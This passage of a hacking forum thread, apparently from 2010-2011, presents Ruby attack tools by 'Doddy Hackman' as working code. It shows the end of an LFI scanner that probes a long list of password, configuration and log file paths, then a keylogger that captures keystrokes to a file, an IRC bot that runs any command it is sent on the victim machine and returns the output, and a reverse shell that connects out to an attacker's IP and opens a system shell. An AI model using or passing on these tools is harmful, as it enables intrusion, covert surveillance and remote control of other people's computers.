cess_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
  url = URI.parse(web)
  files.each do |file|
    begin
      code = toma(url.host,url.path+"?"+url.query+file)
    rescue
      # a failed request for one file must not end the whole scan
      next
    end
    # the include warning disappears when the file exists and could be read
    if not code=~/No such file or directory in/
      print "[Link] : "+web+file+"\n"
    end
  end
end


def scan(web)
  print "\n[+] Testing the vulnerability LFI...\n\n"
  url = URI.parse(web)
  code = toma(url.host,url.path+"?"+url.query+"'")
  if code=~/No such file or directory in/
    # the PHP warning also leaks the script path (full path disclosure)
    saca = code.split("No such file or directory in <b>")
    saca = saca[1].split("</b> on line")
    print "[+] LFI Detected\n\n"
    print "[Full Path Disclosure]: "+saca[0]+"\n"
    print "\n\n[+] Fuzzing Files\n\n"
    fuzz(web)
    print "\n[+] Finish\n"
    copyright()
  else
    print "[-] Not Vulnerable to LFI\n\n"
  end
end

def head()
  print "\n\n -- == LFI tOOL == --\n\n"
end

def copyright()
  print "\n\n\n(C) Doddy Hackman 2010\n\n"
  exit(1)
end

head()
if !ARGV[0]
  uso()
else
  scan(ARGV[0])
end
copyright()
#389
Ruby / [Ruby] Simple Keylogger
July 03, 2011, 09:32:00 PM
A simple keylogger in Ruby

Code: ruby

#!usr/bin/ruby
#Simple Keylogger in Ruby
#(C) Doddy Hackman 2011

require 'Win32API'

def savefile(filename,text)
  # append to the log and close it
  File.open(filename,'a') do |files|
    files.puts text+"\n"
  end
end

def capturar

  nave = Win32API.new("user32","GetAsyncKeyState",["i"],"i")

  while 1

    # bit 0 of GetAsyncKeyState is set when the key was pressed since the last call
    for num1 in (0x30..0x39) #numbers
      if nave.call(num1) & 0x01 == 1
        savefile("logs.txt",num1.chr())
      end
    end

    for num2 in (0x41..0x5A) #letters
      if nave.call(num2) & 0x01 == 1
        savefile("logs.txt",num2.chr())
      end
    end

    sleep 0.01 # do not spin at 100% CPU
  end
end

capturar() #Start the keylogger

# ¿ The End ?
#390
Ruby / [Ruby] IRC Bot
July 03, 2011, 09:31:41 PM
Hello everyone

I just made a simple bot for IRC; the bot
connects from the machine running it (the victim) with a name
set by you, then by just typing

cmdnow :YOUR COMMAND:

you will receive in the same chat a message with the result of the given command

The code is the following

Code: ruby

#!usr/bin/ruby
#IRC Bot (C) Doddy Hackman 2011

require 'socket'

host = "localhost"
canal = "#locos"
botname = "aa"

def head()
  print "\n\n == -- IRC BOT -- ==\n\n"
end

def uso()
  print "\n[+] Sintax : #{$0} <host> <channel> <bot name>\n"
end

def copyright()
  print "\n\n(C) Doddy Hackman 2011\n\n"
end

def bot(host,canal,botname)
  begin
    irc = TCPSocket.open(host,6667)
  rescue
    print "\n\n[-] Error\n\n"
  else
    irc.print "NICK #{botname}\r\n"
    irc.print "USER #{botname} 1 1 1 1\r\n"
    irc.print "JOIN #{canal}\r\n"

    print "\n\n[+] Online\n\n"

    while 1

      code = irc.recv(666)

      # answer the server keepalive or it drops the connection
      if (code=~/PING (\S+)/)
        irc.print "PONG #{$1}\r\n"
      end

      #if code=~/:(.*)!(.*):(.*)/
      #print "Someone : #{$1}\n"
      #print "Said : #{$3}\n"
      #end

      # cmdnow :command: -> run it and send the output back to the channel
      if code=~/cmdnow :(.*):/
        re = IO.popen($1).read
        re = re.gsub("\n","|")
        irc.print "PRIVMSG #{canal} :#{re}\r\n"
      end
    end
  end
end

head()
bot(host,canal,botname)
copyright()


# ¿ The End ?
#391
Ruby / [Ruby] BackShell
July 03, 2011, 09:31:27 PM
A reverse shell in ruby

Code: ruby

#!usr/bin/ruby
#Back Shell (C) Doddy HAckman 2010
#Credits : protos for giving life to an almost forgotten language in this world

require 'socket'

ip = ARGV[0]
port = ARGV[1]

def uso
  print "\n[+] bind.rb <ip> <port>\n"
end

def head
  print "\n\n-- == ReverseShell By Doddy H == --\n\n"
end

def copyright
  print "\n\n(C) Doddy Hackman 2010\n\n"
end


def infowin
  system("net user")
end

def openwin()
  system("cmd.exe")
end

def infolin
  system("uname -a")
end

def openlin()
  system("export TERM=xterm;exec sh -i")
end

def now(ip,port)
  head()
  print "\n[+] Ok , enter to the system\n\n"
  begin
    backdoor = TCPSocket.new(ip,port.to_i)
    # hook stdin/stdout/stderr to the socket so the spawned shell talks to the listener
    $stdout.reopen(backdoor)
    $stderr.reopen(backdoor)
    $stdin.reopen(backdoor)
  rescue
    print "\n[-] Damn error !!\n\n"
    exit(1)
  end
  # /win/ alone would also match "darwin"
  if RUBY_PLATFORM =~ /mswin|mingw|cygwin/
    infowin()
    openwin()
  else
    infolin()
    openlin()
  end
end


if !ip or !port
  uso()
else
  now(ip,port)
end

#The End ???